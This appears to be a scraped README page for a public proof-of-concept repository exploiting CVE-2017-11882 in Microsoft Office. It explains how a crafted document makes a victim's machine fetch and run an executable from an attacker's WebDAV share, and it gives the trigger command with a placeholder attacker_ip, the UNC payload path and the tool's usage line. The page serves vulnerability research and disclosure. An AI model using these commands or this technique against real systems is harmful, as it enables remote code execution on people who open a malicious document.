CVE-2017-11882

by embedi

Proof-of-Concept exploits for CVE-2017-11882

471 Stars 199 Forks Last release: Not found 3 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:

CVE-2017-11882

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.

The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff

Attacker controlled binary path should be a UNC network path:

\\attacker_ip\ff\1.exe

Usage

webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example
folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.